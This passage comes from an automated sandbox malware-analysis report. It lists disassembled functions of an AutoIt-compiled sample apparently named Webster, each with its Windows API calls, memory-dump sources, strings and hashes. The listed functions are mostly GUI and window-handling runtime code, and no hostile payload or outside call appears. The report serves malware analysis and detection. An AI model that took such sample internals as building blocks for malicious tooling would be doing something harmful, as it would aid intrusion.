                                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 00A82DA5
                                                                                    • Part of subcall function 00A82714: GetCursorPos.USER32(?), ref: 00A82727
                                                                                    • Part of subcall function 00A82714: ScreenToClient.USER32(00B477B0,?), ref: 00A82744
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000001), ref: 00A82769
                                                                                    • Part of subcall function 00A82714: GetAsyncKeyState.USER32(00000002), ref: 00A82777
                                                                                  • SetTimer.USER32(00000000,00000000,00000028,00A813C7), ref: 00A82DCC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                  • String ID: AutoIt v3 GUI
                                                                                  • API String ID: 1458621304-248962490
                                                                                  • Opcode ID: 441f1769a4fc2ebd70a0fa13c81b5fa60cd4e0369fa383260b06a9947ca18cc9
                                                                                  • Instruction ID: c62c76d24a0beb02a17b3f8041106b8cd47ad28b1556bc0114204867606ebdb0
                                                                                  • Opcode Fuzzy Hash: 441f1769a4fc2ebd70a0fa13c81b5fa60cd4e0369fa383260b06a9947ca18cc9
                                                                                  • Instruction Fuzzy Hash: 8DB16C75A4020A9FDB14EFA8DD89BFD7BB5FB08310F108129FA15E7290DB74A950CB54
                                                                                  Function 00AA0429 Relevance: 30.1, APIs: 8, Strings: 9, Instructions: 349COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • GetForegroundWindow.USER32(00B10980,?,?,?,?,?), ref: 00AA04E3
                                                                                  • IsWindow.USER32(?), ref: 00AD66BB
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$Foreground_memmove
                                                                                  • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                  • API String ID: 3828923867-1919597938
                                                                                  • Opcode ID: 70f2f5ce8d2edf0e8ed4f39c15cd4905d900bbd5790fed434cd10b0627417510
                                                                                  • Instruction ID: e9d9ac8b92305c3b7b74a858febd5e08d79130f78ffe99a490b832193449c4b4
                                                                                  • Opcode Fuzzy Hash: 70f2f5ce8d2edf0e8ed4f39c15cd4905d900bbd5790fed434cd10b0627417510
                                                                                  • Instruction Fuzzy Hash: 59D1B531204706DFCB08EF20C6819AABBF5BF55344F604A1AF496576A2DF30F999CB91
                                                                                  Function 00B0441F Relevance: 28.3, APIs: 3, Strings: 13, Instructions: 283windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B044AC
                                                                                  • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00B0456C
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
                                                                                  • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                  • API String ID: 3974292440-719923060
                                                                                  • Opcode ID: 57ba86451c1617544bc3da62493b671bd7ace60942defe391f497523cea60977
                                                                                  • Instruction ID: 9452a041ce89390b2fd2784eb88108e8a9a3c1b6c4af1d8defd8980c8e1be483
                                                                                  • Opcode Fuzzy Hash: 57ba86451c1617544bc3da62493b671bd7ace60942defe391f497523cea60977
                                                                                  • Instruction Fuzzy Hash: D3A180712142019FCB14FF60CA91A6AB7E5EF99314F2089A8F9569B3E2DF30EC05CB51
                                                                                  Function 00AF56C8 Relevance: 27.1, APIs: 18, Instructions: 124COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadCursorW.USER32(00000000,00007F89), ref: 00AF56E1
                                                                                  • LoadCursorW.USER32(00000000,00007F8A), ref: 00AF56EC
                                                                                  • LoadCursorW.USER32(00000000,00007F00), ref: 00AF56F7
                                                                                  • LoadCursorW.USER32(00000000,00007F03), ref: 00AF5702
                                                                                  • LoadCursorW.USER32(00000000,00007F8B), ref: 00AF570D
                                                                                  • LoadCursorW.USER32(00000000,00007F01), ref: 00AF5718
                                                                                  • LoadCursorW.USER32(00000000,00007F81), ref: 00AF5723
                                                                                  • LoadCursorW.USER32(00000000,00007F88), ref: 00AF572E
                                                                                  • LoadCursorW.USER32(00000000,00007F80), ref: 00AF5739
                                                                                  • LoadCursorW.USER32(00000000,00007F86), ref: 00AF5744
                                                                                  • LoadCursorW.USER32(00000000,00007F83), ref: 00AF574F
                                                                                  • LoadCursorW.USER32(00000000,00007F85), ref: 00AF575A
                                                                                  • LoadCursorW.USER32(00000000,00007F82), ref: 00AF5765
                                                                                  • LoadCursorW.USER32(00000000,00007F84), ref: 00AF5770
                                                                                  • LoadCursorW.USER32(00000000,00007F04), ref: 00AF577B
                                                                                  • LoadCursorW.USER32(00000000,00007F02), ref: 00AF5786
                                                                                  • GetCursorInfo.USER32(?), ref: 00AF5796
                                                                                  • GetLastError.KERNEL32(00000001,00000000), ref: 00AF57C1
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Cursor$Load$ErrorInfoLast
                                                                                  • String ID:
                                                                                  • API String ID: 3215588206-0
                                                                                  • Opcode ID: 0533ad510c8686291dc82739bb9eb091b6c95e2b3da9bbaa6007c67e6deef583
                                                                                  • Instruction ID: 39a98a081ee5c3bfced681aa63ec411fe6f876b22c34bf9b8e7c7842d3ebb7af
                                                                                  • Opcode Fuzzy Hash: 0533ad510c8686291dc82739bb9eb091b6c95e2b3da9bbaa6007c67e6deef583
                                                                                  • Instruction Fuzzy Hash: DC415470E043196ADB109FB68C49D6EFEF8EF51B50B10452FF619E7290DAB8A500CF91
                                                                                  Function 00ADB13A Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00ADB17B
                                                                                  • __swprintf.LIBCMT ref: 00ADB21C
                                                                                  • _wcscmp.LIBCMT ref: 00ADB22F
                                                                                  • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00ADB284
                                                                                  • _wcscmp.LIBCMT ref: 00ADB2C0
                                                                                  • GetClassNameW.USER32(?,?,00000400), ref: 00ADB2F7
                                                                                  • GetDlgCtrlID.USER32(?), ref: 00ADB349
                                                                                  • GetWindowRect.USER32(?,?), ref: 00ADB37F
                                                                                  • GetParent.USER32(?), ref: 00ADB39D
                                                                                  • ScreenToClient.USER32(00000000), ref: 00ADB3A4
                                                                                  • GetClassNameW.USER32(?,?,00000100), ref: 00ADB41E
                                                                                  • _wcscmp.LIBCMT ref: 00ADB432
                                                                                  • GetWindowTextW.USER32(?,?,00000400), ref: 00ADB458
                                                                                  • _wcscmp.LIBCMT ref: 00ADB46C
                                                                                    • Part of subcall function 00AA385C: _iswctype.LIBCMT ref: 00AA3864
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                                                  • String ID: %s%u
                                                                                  • API String ID: 3744389584-679674701
                                                                                  • Opcode ID: 505625edce6f5863457b02f181bf2262352d60b43d178382755ce15d0de43b7c
                                                                                  • Instruction ID: cff761f13536394f5fc7f1903391f3ccab17b28ec8df40475093171a9d59b872
                                                                                  • Opcode Fuzzy Hash: 505625edce6f5863457b02f181bf2262352d60b43d178382755ce15d0de43b7c
                                                                                  • Instruction Fuzzy Hash: 3AA1BF71224206EFDB14DF24C884BEAB7A8FF44354F11861AF99AC3291DB30E955CBA1
                                                                                  Function 00ADBA6D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • GetClassNameW.USER32(00000008,?,00000400), ref: 00ADBAB1
                                                                                  • _wcscmp.LIBCMT ref: 00ADBAC2
                                                                                  • GetWindowTextW.USER32(00000001,?,00000400), ref: 00ADBAEA
                                                                                  • CharUpperBuffW.USER32(?,00000000), ref: 00ADBB07
                                                                                  • _wcscmp.LIBCMT ref: 00ADBB25
                                                                                  • _wcsstr.LIBCMT ref: 00ADBB36
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBB6E
                                                                                  • _wcscmp.LIBCMT ref: 00ADBB7E
                                                                                  • GetWindowTextW.USER32(00000002,?,00000400), ref: 00ADBBA5
                                                                                  • GetClassNameW.USER32(00000018,?,00000400), ref: 00ADBBEE
                                                                                  • _wcscmp.LIBCMT ref: 00ADBBFE
                                                                                  • GetClassNameW.USER32(00000010,?,00000400), ref: 00ADBC26
                                                                                  • GetWindowRect.USER32(00000004,?), ref: 00ADBC8F
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                  • String ID: @$ThumbnailClass
                                                                                  • API String ID: 1788623398-1539354611
                                                                                  • Opcode ID: bc5afa0a477f2c8201b6e781ea6aff91fb41bb39c70ab4122c692f83f9a05fc8
                                                                                  • Instruction ID: 51b529b0486d6a12ba6f3113301bdb4dbd66d206577128c922ffda5938632bb8
                                                                                  • Opcode Fuzzy Hash: bc5afa0a477f2c8201b6e781ea6aff91fb41bb39c70ab4122c692f83f9a05fc8
                                                                                  • Instruction Fuzzy Hash: A2819E7102420ADFDB00DF14C985FAA77E8FF48354F14856AFD8A8A2A6DB30DD45CB61
                                                                                  Function 00ADB8B6 Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 105COMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: __wcsnicmp
                                                                                  • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                  • API String ID: 1038674560-1810252412
                                                                                  • Opcode ID: 04f4dd4c52ef9727e7445669f2bd464def5f8294d7f60b36faec0db7ecd43e0a
                                                                                  • Instruction ID: 28fbd33f203f3f9cdae0e5b81a3c875ca82f34e6ff75eeddbb0faf15bec36fcd
                                                                                  • Opcode Fuzzy Hash: 04f4dd4c52ef9727e7445669f2bd464def5f8294d7f60b36faec0db7ecd43e0a
                                                                                  • Instruction Fuzzy Hash: D831A331A44206E6DF14EBA0CE63EAD73F4AF20790F700526F592711E1EF556E04C562
                                                                                  Function 00ADCB97 Relevance: 25.7, APIs: 17, Instructions: 169windowtimeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • LoadIconW.USER32(00000063), ref: 00ADCBAA
                                                                                  • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 00ADCBBC
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00ADCBD3
                                                                                  • GetDlgItem.USER32(?,000003EA), ref: 00ADCBE8
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00ADCBEE
                                                                                  • GetDlgItem.USER32(?,000003E9), ref: 00ADCBFE
                                                                                  • SetWindowTextW.USER32(00000000,?), ref: 00ADCC04
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00ADCC25
                                                                                  • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00ADCC3F
                                                                                  • GetWindowRect.USER32(?,?), ref: 00ADCC48
                                                                                  • SetWindowTextW.USER32(?,?), ref: 00ADCCB3
                                                                                  • GetDesktopWindow.USER32 ref: 00ADCCB9
                                                                                  • GetWindowRect.USER32(00000000), ref: 00ADCCC0
                                                                                  • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00ADCD0C
                                                                                  • GetClientRect.USER32(?,?), ref: 00ADCD19
                                                                                  • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00ADCD3E
                                                                                  • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00ADCD69
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                  • String ID:
                                                                                  • API String ID: 3869813825-0
                                                                                  • Opcode ID: 618263bac747ad876b100270daac63873609a0a9c91effbc2a8e02668bc6418b
                                                                                  • Instruction ID: 8d336c001b84c091b881cc34cd0555672313f5568e3585e2b568052a6e22cabe
                                                                                  • Opcode Fuzzy Hash: 618263bac747ad876b100270daac63873609a0a9c91effbc2a8e02668bc6418b
                                                                                  • Instruction Fuzzy Hash: 9051603090070AEFDB209FA8CE85BAEBBF5FF44715F404519E686A36A0CB74E954CB50
                                                                                  Function 00B0A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • _memset.LIBCMT ref: 00B0A87E
                                                                                  • DestroyWindow.USER32(?,?), ref: 00B0A8F8
                                                                                    • Part of subcall function 00A91821: _memmove.LIBCMT ref: 00A9185B
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B0A972
                                                                                  • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B0A994
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0A9A7
                                                                                  • DestroyWindow.USER32(00000000), ref: 00B0A9C9
                                                                                  • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00A80000,00000000), ref: 00B0AA00
                                                                                  • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B0AA19
                                                                                  • GetDesktopWindow.USER32 ref: 00B0AA32
                                                                                  • GetWindowRect.USER32(00000000), ref: 00B0AA39
                                                                                  • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B0AA51
                                                                                  • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B0AA69
                                                                                    • Part of subcall function 00A829AB: GetWindowLongW.USER32(?,000000EB), ref: 00A829BC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                  • String ID: 0$tooltips_class32
                                                                                  • API String ID: 1297703922-3619404913
                                                                                  • Opcode ID: 9da8d01087bcd5ee2fb8949a7cc0192d768512cb0ef162ddc26c1047e2000442
                                                                                  • Instruction ID: 40eb815d86a447cd3541e5ae9b31cb4eb52636e720373f6be0cca46fd3d4705e
                                                                                  • Opcode Fuzzy Hash: 9da8d01087bcd5ee2fb8949a7cc0192d768512cb0ef162ddc26c1047e2000442
                                                                                  • Instruction Fuzzy Hash: 21719871254304AFDB21DF28CC49FAA7BE5FB89300F54895DF986872A1DB70AA41CB52
                                                                                  Function 00B0CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                    • Part of subcall function 00A829E2: GetWindowLongW.USER32(?,000000EB), ref: 00A829F3
                                                                                  • DragQueryPoint.SHELL32(?,?), ref: 00B0CCCF
                                                                                    • Part of subcall function 00B0B1A9: ClientToScreen.USER32(?,?), ref: 00B0B1D2
                                                                                    • Part of subcall function 00B0B1A9: GetWindowRect.USER32(?,?), ref: 00B0B248
                                                                                    • Part of subcall function 00B0B1A9: PtInRect.USER32(?,?,00B0C6BC), ref: 00B0B258
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CD38
                                                                                  • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B0CD43
                                                                                  • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B0CD66
                                                                                  • _wcscat.LIBCMT ref: 00B0CD96
                                                                                  • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B0CDAD
                                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00B0CDC6
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDDD
                                                                                  • SendMessageW.USER32(?,000000B1,?,?), ref: 00B0CDFF
                                                                                  • DragFinish.SHELL32(?), ref: 00B0CE06
                                                                                  • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B0CEF9
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                  • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                  • API String ID: 169749273-3440237614
                                                                                  • Opcode ID: f2df091e325f6b637e10bbeb1bba45bcd42b23a3f68a341df52c70bd31fb9eda
                                                                                  • Instruction ID: e6d170d50f92e8664a11ae88cff43e8594ebbaf46cc44af7affe0e1ed84d2da3
                                                                                  • Opcode Fuzzy Hash: f2df091e325f6b637e10bbeb1bba45bcd42b23a3f68a341df52c70bd31fb9eda
                                                                                  • Instruction Fuzzy Hash: AD615972108301AFC701EF54DC85D9BBFE8EF89750F500A6EF595932A1DB70AA49CB52
                                                                                  Function 00AE82D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00AE831A
                                                                                  • VariantCopy.OLEAUT32(00000000,?), ref: 00AE8323
                                                                                  • VariantClear.OLEAUT32(00000000), ref: 00AE832F
                                                                                  • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00AE841D
                                                                                  • __swprintf.LIBCMT ref: 00AE844D
                                                                                  • VarR8FromDec.OLEAUT32(?,?), ref: 00AE8479
                                                                                  • VariantInit.OLEAUT32(?), ref: 00AE852A
                                                                                  • SysFreeString.OLEAUT32(?), ref: 00AE85BE
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AE8618
                                                                                  • VariantClear.OLEAUT32(?), ref: 00AE8627
                                                                                  • VariantInit.OLEAUT32(00000000), ref: 00AE8665
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                  • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                  • API String ID: 3730832054-3931177956
                                                                                  • Opcode ID: cd7650d5107d5d116f0309f17c9a9dae9a098313812dbc12ab77c59d986da231
                                                                                  • Instruction ID: 3c38e7e8fa04feac5b2f3c0a8426399f77af2eb9c7ba4dde494eb79b57a30320
                                                                                  • Opcode Fuzzy Hash: cd7650d5107d5d116f0309f17c9a9dae9a098313812dbc12ab77c59d986da231
                                                                                  • Instruction Fuzzy Hash: C1D1E371604556EBDF20AFA6C894BAEB7B4FF05B00F248555E409AF290DF78EC40DBA1
                                                                                  Function 00B049CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                  Download Yara Rule
                                                                                  APIs
                                                                                  • CharUpperBuffW.USER32(?,?), ref: 00B04A61
                                                                                  • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B04AAC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 0000000B.00000002.3320806336.0000000000A81000.00000020.00000001.01000000.00000006.sdmp, Offset: 00A80000, based on PE: true
                                                                                  • Associated: 0000000B.00000002.3320700371.0000000000A80000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B10000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320904007.0000000000B36000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3320984172.0000000000B40000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                  • Associated: 0000000B.00000002.3321005424.0000000000B49000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_11_2_a80000_Webster.jbxd
                                                                                  Similarity
                                                                                  • API ID: BuffCharMessageSendUpper
